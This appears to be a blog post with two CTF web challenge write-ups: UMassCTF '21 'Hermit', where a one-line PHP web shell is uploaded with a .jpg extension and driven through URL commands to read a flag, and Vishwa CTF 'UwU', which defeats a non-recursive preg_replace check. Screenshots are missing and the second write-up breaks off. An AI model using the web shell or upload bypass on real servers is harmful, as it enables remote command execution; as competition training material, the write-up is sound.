UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quick test image upload and I see how it works:

It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

No I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}

Vishwa CTF: Web: UwU (469)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the site, we are given this page:

After a little poking around, I look for a robots.txt entry:

Interesting! Now I follow the clue and look for a robots directory:

I click the link on the page for the source code and I get this:

After reviewing the code, I see that the PHP is looking for an input parameter “php_is_hard” and it runs “preg_replace()” on it and evaluates the output of that.

  if (isset($_GET['php_is_hard'])) {
  
    $you_enter = $_GET['php_is_hard'];
  
    $we_enter = 'suzuki_harumiya';
  
    $the_final_one = preg_replace(
    
      "/$we_enter/", '', $you_enter);
  
      if ($the_final_one === $we_enter) {
  
        open_up();
    }
  }

Analyzing this code, I see that it takes my input and looks for all instances of “suzuki_harumiya” and removes it. Then it compares the resulting string to “suzuki_harumiya”. If it is true, then it runs the “open_up()” function.

I see that I can simply manipulate my input to “ssuzuki_harumiyauzuki_harumiya” and the script will remove the single instance of “suzuki_harumiya” in it and the resulting string will, in fact, be “suzuki_harumiya”. When I feed that input, I get this: